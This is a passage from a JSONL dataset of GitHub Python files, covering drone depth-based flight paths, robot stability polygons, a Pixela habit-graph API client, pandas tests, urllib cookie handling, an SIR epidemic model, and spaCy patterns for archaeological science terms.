\n\tremovecols=measfct.default_removecols\n\t)\n\nmegalut.tools.table.keepunique(cat)\nmegalut.tools.io.writepickle(cat, os.path.join(workdir, sp.name, \"groupmeascat.pkl\"))\n\"\"\"\n\n\n","repo_name":"megalut/megalut","sub_path":"runs/malte/meastest/run_sim.py","file_name":"run_sim.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"99"} +{"seq_id":"13636037709","text":"import cv2\nimport multiprocessing\nimport numpy as np\nfrom multiprocessing import Pool\n\n# write the final side by side image for flight travel\ndef create_flight_direction_output(video_name, original_image, depth_image, output_path, flight_path):\n # take the depth image and draw the flight_path arrow onto it\n depth_with_arrow_path = cv2.arrowedLine(depth_image, (788, 246), (int(flight_path[0]), int(flight_path[1])), (255,255,255), 3)\n # resize the depth image to be the same as the original video frame (1920x1080)\n resized_final_depth_flight = cv2.resize(depth_with_arrow_path, (1920, 1080), interpolation = cv2.INTER_AREA)\n # create comparison images -- original on top, depth with flight path on 
the bottom\n stacked_final_result = np.concatenate((original_image, resized_final_depth_flight), axis=0)\n cv2.imwrite(output_path, stacked_final_result)\n\n return stacked_final_result\n\n# take deepest path and calculate the endpoint of the arrow to be drawn\ndef calculate_flight_direction(deepest_zone_coordinates):\n top_left = deepest_zone_coordinates[0]\n bottom_right = deepest_zone_coordinates[1]\n # we want to go to the center of the zone\n # this could be tweaked later to be more precise, not sure if we want to be that precise though\n # it might cause jerking in the flight so we will keep it to the zoning\n # **we probably could make something more sophisticated leveraging zones and then smoothing of the depth intensities\n # i think that goes past what this project is meant to do though\n center_x = (top_left[0] + bottom_right[0]) / 2\n center_y = (top_left[1] + bottom_right[1]) / 2\n return center_x, center_y\n\ndef calculate_deepest_point(image):\n # we have a 1576x492 image \n # we are going to break it down into a grid of 12 rows and 8 columns\n # we will use the idea of a kernel of 197x41 (width x height) to look at each of our zones\n # we will find out the average zone depth per region\n # we will try to find a zone closest to the center of the image before deciding a far-away zone is the deepest\n # we then take the center point of the image\n height = 492\n width = 1576\n kernel_height = 41 # 41\n kernel_width = 197 # 197\n kernel_rows = int(height/kernel_height) # 12\n kernel_columns = int(width/kernel_width) # 8\n\n # get the grayscale of the image\n # most deep == most dark == closest to 0\n image_grayscale = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # these will be for tracking the deepest point as we go through the image\n deepest_zone_average = 255\n deepest_zone_row = 0\n deepest_zone_column = 0\n for r in range(kernel_rows - 2): # (0-9) -- removing the bottom two rows since the heatmap is skewed\n for c in range(kernel_columns): # (0-7)\n starting_row = r*kernel_height\n starting_column = c*kernel_width\n running_total = 0\n for k_r in range(kernel_height):\n for k_c in range(kernel_width):\n running_total += image_grayscale[starting_row + k_r][starting_column + k_c]\n kernel_average = running_total / (kernel_height*kernel_width)\n # we need to favor the center of the picture much more than the perimetet\n # we will take the zones from a rectangle in the center and decrease them by 50%\n # but other zones will stay as is\n if r > 1 and r < 8 and c > 1 and c < 6:\n kernel_average *= .5\n if (kernel_average < deepest_zone_average):\n deepest_zone_average = kernel_average\n deepest_zone_row = r\n deepest_zone_column = c\n \n # find the spot in the matrix that is the deepest zone\n top_left = [deepest_zone_column*kernel_width, deepest_zone_row*kernel_height]\n bottom_right = [(deepest_zone_column+1)*kernel_width, (deepest_zone_row+1)*kernel_height]\n\n return calculate_flight_direction([top_left, bottom_right])\n\ndef process_depth_calculations(video_name):\n datasets_folder = \"datasets/\"\n video_file = datasets_folder + video_name + \".mp4\"\n # reading the video\n capture = cv2.VideoCapture(video_file)\n frame_count = 0\n final_output_frames = []\n while capture.isOpened():\n # video frame -- original image\n ret, original_image = capture.read()\n depth_image = cv2.imread(datasets_folder + video_name + \"/\" + str(frame_count) + \".png\")\n\n # if there are no more depth images then we stop\n if type(depth_image) == type(None):\n break\n\n # build the output 
path\n output_path = datasets_folder + video_name + \"/final_comparison_\" + str(frame_count) + \".png\"\n\n # deepest point\n deepest_x, deepest_y = calculate_deepest_point(depth_image)\n\n # create final output\n result = create_flight_direction_output(video_name, original_image, depth_image, output_path, [deepest_x, deepest_y])\n final_output_frames.append(result)\n frame_count += 1\n # create a video of final output files\n final_video_name = datasets_folder + video_name + \"/final_comparison_\" + video_name + \".mp4\"\n final_video = cv2.VideoWriter(final_video_name, cv2.VideoWriter_fourcc('m', 'p', '4', 'v'), 30, (1920, 2160))\n for i in range(len(final_output_frames)):\n final_video.write(final_output_frames[i])\n final_video.release()\n\n\nif __name__ == \"__main__\":\n input_videos = [\"good_path\", \"floor\", \"right_wall\"]\n \n # multiprocessing of the videos - calulating the Deepest Zones and creating the output images\n pool = multiprocessing.Pool(3)\n zip(pool.map(process_depth_calculations, input_videos))","repo_name":"richard-frink/drone-piloting-with-wavelet-monodepth","sub_path":"flight_path_creator.py","file_name":"flight_path_creator.py","file_ext":"py","file_size_in_byte":5677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"73145669764","text":"from __future__ import print_function\nfrom builtins import zip\nimport stabilipy as stab\nimport numpy as np\nimport sys\n\nfrom unilateral_contacts import pos, normals\n\nimport matplotlib.pyplot as plt\n\nazim = 48.9035087719\nelev = 31.5350877193\nxlim = [-0.95389899, 0.95389899]\nylim = [-0.95389899, 0.95389899]\nzlim = [-0.95389899, 0.95389899]\n\ndef main(margin):\n mu = 0.5\n contacts = [stab.Contact(mu, p, n) for p, n in zip(pos, normals)]\n\n contacts[2].mu = 0.5\n\n polyhedron = stab.StabilityPolygon(200, dimension=3, radius=1.5, robust_sphere=False)\n polyhedron.contacts = contacts\n\n polygon = stab.StabilityPolygon(200, dimension=2, radius=1.5)\n polygon.contacts = contacts\n\n shape = [\n np.array([[-1., 0, 0]]).T,\n np.array([[1., 0, 0]]).T,\n np.array([[0, 1., 0]]).T,\n np.array([[0, -1., 0]]).T,\n np.array([[0, 0., 1]]).T,\n np.array([[0, 0., -1]]).T\n ]\n\n polytope = [margin*s for s in shape]\n\n polyhedron.gravity_envelope = polytope\n polyhedron.compute(stab.Mode.iteration, epsilon=2e-3, maxIter=10, solver='qhull',\n record_anim=False, plot_init=False,\n plot_step=False, plot_final=True)\n #polyhedron.reset_fig()\n #polyhedron.ax.set_xlabel(\"x(m)\")\n #polyhedron.ax.set_ylabel(\"y(m)\")\n #polyhedron.ax.set_zlabel(\"z(m)\")\n #polyhedron.ax.view_init(elev=elev, azim=azim)\n #polyhedron.ax.set_xlim3d(*xlim)\n #polyhedron.ax.set_ylim3d(*ylim)\n #polyhedron.ax.set_zlim3d(*zlim)\n #polyhedron.plot_contacts()\n #polyhedron.plot_solution()\n #polyhedron.plot_polyhedrons()\n #polyhedron.show()\n\n #plt.savefig('{}.png'.format(margin))\n\n #polygon.gravity_envelope = polytope\n #polygon.compute(stab.Mode.best, epsilon=2e-3, maxIter=20, solver='parma',\n # record_anim=False, plot_init=False,\n # plot_step=False, plot_final=False)\n\n #print polyhedron.volume_convex(polyhedron.inner)\n #print 3*polygon.volume_convex(polygon.inner)\n\nprint(\"Margin : {}\".format(sys.argv[1]))\n\nmain(float(sys.argv[1]))\n","repo_name":"haudren/stabilipy","sub_path":"examples/unilateral_example.py","file_name":"unilateral_example.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"99"} 
+{"seq_id":"25616598277","text":"import requests\nimport datetime as dt\nfrom dotenv import dotenv_values\n\nconfig = dotenv_values(\".env\")\n\nURL = config[\"URL\"]\nGRAPH = config[\"GRAPH\"]\nTOKEN = config[\"TOKEN\"]\nUSER = config[\"USER\"]\nG_ID= config[\"G_ID\"]\n\n#1 create USER\n\nreq = {\n \"token\": TOKEN,\n \"username\": USER,\n \"agreeTermsOfService\": \"yes\",\n \"notMinor\": \"yes\",\n}\n#\n# data = requests.post(URL, json=req)\n\n#2 create graph\n\nhead = {\n \"X-USER-TOKEN\": TOKEN\n}\nreq_graph = {\n \"id\": G_ID,\n \"name\": \"ambition\",\n \"unit\": \"effort\",\n \"type\": \"int\",\n \"color\": \"ajisai\",\n}\n\n# data = requests.post(url=f\"{URL}/{USER}/graphs\", json=req_graph, headers=head)\n# print(data.text)\n\n#3 PUSH PIXEL\ntoday = dt.datetime.now()\ntoday = today.strftime(\"%Y%m%d\")\npixel_insert = {\n \"date\": today,\n \"quantity\": \"10\"\n}\n# data = requests.post(f\"{URL}/{USER}/graphs/{G_ID}\", json=pixel_insert, headers=head)\n# print(data.text)\n\n#4 update a pixel\npixel_update = {\n \"quantity\": \"15\"\n}\ndata = requests.put(f\"{URL}/{USER}/graphs/{G_ID}/{today}\", json=pixel_update, headers=head)\nprint(data.text)\n\n#5 DELETE PIXEL\n# data = requests.delete(f\"{URL}/{USER}/graphs/{G_ID}/{today}\", headers=head)\n# print(data.text)\n","repo_name":"Kunal-J15/Pixela","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"71761077766","text":"import pandas as pd\nimport os\n\n\ndef test_read_excel():\n excel = os.path.join(os.path.dirname(__file__), \"position.xlsx\")\n\n df = pd.read_excel(excel, convert_float=False, index_col=0)\n print(df)\n\n\ndef test_split():\n df = pd.read_csv(os.path.join(os.path.dirname(__file__), 'address_data.csv'), index_col=0)\n df['state'] = df['place_with_parent_names'].str.split('|', expand=True)[2]\n print(df)\n","repo_name":"xjohnwu/python_features","sub_path":"tests/dataframetests/test_dataframe_read.py","file_name":"test_dataframe_read.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"38655501673","text":"import http.cookiejar\nimport urllib.request\n\ncookie = http.cookiejar.CookieJar()\nhandler = urllib.request.HTTPCookieProcessor(cookie)\nopener = urllib.request.build_opener(handler)\nresponse = opener.open('http://www.baidu.com')\nfor item in cookie:\n print(item.name+\"=\"+item.value)\nprint(response)\n\n# 保存cookie txt格式\ncookie1 = http.cookiejar.MozillaCookieJar('cookies.txt')\n# 缺少中间几部生成的cookies文件没有内容\ncookie1.save(ignore_discard=True, ignore_expires=True)\n\n# 保存cookie为LWP格式\ncookie2 = http.cookiejar.LWPCookieJar('cookie2.txt')\nhandler = urllib.request.HTTPCookieProcessor(cookie2)\nopener = urllib.request.build_opener(handler)\nresponse = opener.open('http://www.baidu.com')\ncookie2.save(ignore_discard=True, ignore_expires=True)\n\n# 调用cookie\ncookie3 = http.cookiejar.LWPCookieJar()\ncookie3.load('cookie2.txt', ignore_discard=True, ignore_expires=True)\nhandler = urllib.request.HTTPCookieProcessor(cookie3)\nopener = urllib.request.build_opener(handler)\nresponse = 
opener.open('http://www.baidu.com')\nprint(response.read().decode('utf-8'))","repo_name":"dianligegege/learn-Python","sub_path":"spider/基本库的使用/urllib/发送请求/cookies.py","file_name":"cookies.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"24517310953","text":"# 题目:881.救生艇\n# 难度:MEDIUM\n# 最后提交:2022-06-06 19:13:09 +0800 CST\n# 语言:python3\n# 作者:ZrjaK\n\nfrom sortedcontainers import SortedList\nclass Solution:\n def numRescueBoats(self, people: List[int], limit: int) -> int:\n s = SortedList(people)\n ans = 0\n while s:\n k = s[-1]\n s.remove(k)\n t = s.bisect_right(limit-k)\n if s and t > 0 and s[t-1] + k <= limit:\n s.pop(t-1)\n ans += 1\n return ans","repo_name":"ZrjaK/algorithm","sub_path":"OJ/leetcode/881.救生艇.py","file_name":"881.救生艇.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"41337087403","text":"import scipy.integrate as spi\nimport numpy as np\nimport pylab as pl\n\nbeta=1.4247\ngamma=0.14286\nTS=1.0\nND=70.0\nS0=1-1e-6\nI0=1e-6\nINPUT = (S0, I0, 0.0)\n\n\ndef SIR(x,t): \n\t'''The main set of equations'''\n\tY = np.zeros((3))\n\tX = x\n\tY[0] = - beta * X[0] * X[1] # this is S\n\tY[1] = beta * X[0] * X[1] - gamma * X[1] # this is I\n\tY[2] = gamma * X[1] # this is R\n\treturn Y # For odeint\n\nt_start = 0.0; t_end = ND; t_inc = TS\nt_range = np.arange(t_start, t_end+t_inc, t_inc)\nRES = spi.odeint(SIR,INPUT,t_range)\n\nprint(RES)\n\n#Ploting\npl.subplot(211)\npl.plot(RES[:,0], '-g', label='Susceptibles')\npl.plot(RES[:,2], '-k', label='Recovereds')\npl.legend(loc=0)\npl.title('SIR')\npl.xlabel('Time')\npl.ylabel('Susceptibles and Recovereds')\npl.subplot(212)\npl.plot(RES[:,1], '-r', label='Infectious')\npl.xlabel('Time')\npl.ylabel('Infectious')\npl.show()\n","repo_name":"taylor-js/SIRModels","sub_path":"SIR.py","file_name":"SIR.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"70880121605","text":"##\n# Reads baby names from files and makes lists of all the distinct boys and girls names\n#\n\ngirls = []\nboys = []\n\nfor year in range(1900, 2013):\n girl_fname = f\"BabyNames/{year}_GirlsNames.txt\"\n boy_fname = f\"BabyNames/{year}_BoysNames.txt\"\n\n inf = open(girl_fname)\n for line in inf:\n parts = line.split()\n name = parts[0]\n if name not in girls:\n girls.append(name)\n inf.close()\n\n inf = open(boy_fname)\n for line in inf:\n parts = line.split()\n name = parts[0]\n if name not in boys:\n boys.append(name)\n inf.close()\n\nprint(sorted(boys))\nprint(sorted(girls))\n","repo_name":"nmoore32/Python-Workbook","sub_path":"7 Files and Exceptions/exercise166.py","file_name":"exercise166.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"41066825749","text":"patterns_en_FISH_ARCHSCIENCE = [\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144514\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"alpha\"},\r\n\t\t\t{\"LOWER\": \"spectrometry\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142099\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"altered\"},\r\n\t\t\t{\"LOWER\": \"by\"},\r\n\t\t\t{\"LOWER\": \"animals\"}\r\n\t\t] \r\n 
},\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142100\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"amino\"},\r\n\t\t\t{\"LOWER\": \"acid\"},\r\n\t\t\t{\"LOWER\": \"racemisation\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142101\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"ancient\"},\r\n\t\t\t{\"LOWER\": \"biomolecular\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142102\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"anoxic\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142103\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"antler\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170618\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"archaeobotany\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142104\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"archaeomagnetism\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170615\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"archaeomalacology\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170616\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"archaeozoology\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142105\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"aspect\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142106\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"available\"},\r\n\t\t\t{\"LOWER\": \"phosphorus\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142981\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"beach\"},\r\n\t\t\t{\"LOWER\": \"deposit\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170621\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"bioarchaeology\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144519\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"biogenic\"},\r\n\t\t\t{\"LOWER\": \"carbonate\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142107\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"biostratigraphy\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142108\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"block\"},\r\n\t\t\t{\"LOWER\": \"lifting\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142109\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"bone\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144515\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": 
\"brick\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142122\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"bulk\"},\r\n\t\t\t{\"LOWER\": \"sampling\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142111\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"burnt\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142111\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"burnt\"},\r\n\t\t\t{\"LOWER\": \"deposit\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144517\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"burnt\"},\r\n\t\t\t{\"LOWER\": \"flint\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142188\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"c14\"},\r\n\t\t\t{\"LOWER\": \"dating\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142113\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"calcined\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142188\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"carbon\"},\r\n\t\t\t{\"LOWER\": \"14\"},\r\n\t\t\t{\"LOWER\": \"dating\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142188\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"carbon\"},\r\n\t\t\t{\"LOWER\": \"dating\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142118\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"carbonised\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/148327\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"carved\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142117\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"charcoal\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142118\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"charred\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142119\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"chemical\"},\r\n\t\t\t{\"LOWER\": \"techniques\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142120\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"chemically\"},\r\n\t\t\t{\"LOWER\": \"altered\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142121\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"clast\"},\r\n\t\t\t{\"LOWER\": \"lithological\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142122\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"coarse\"},\r\n\t\t\t{\"LOWER\": \"sieving\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142124\",\r\n 
\"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"colored\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142124\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"coloured\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142125\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"copper\"},\r\n\t\t\t{\"LOWER\": \"alloy\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142126\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"coprolite\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142113\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"cremated\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142128\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"dating\"},\r\n\t\t\t{\"LOWER\": \"techniques\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142129\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"decorated\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142129\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"decoration\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142131\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"dendrochronology\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142132\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"desiccated\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170614\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"diatom\"},\r\n\t\t\t{\"LOWER\": \"analysis\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142180\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"disease\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142180\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"diseased\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142135\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"egg\"},\r\n\t\t\t{\"LOWER\": \"shell\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142136\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"electron\"},\r\n\t\t\t{\"LOWER\": \"spin\"},\r\n\t\t\t{\"LOWER\": \"resonance\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142977\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"estuarine\"},\r\n\t\t\t{\"LOWER\": \"deposit\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142137\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"feather\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144521\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": 
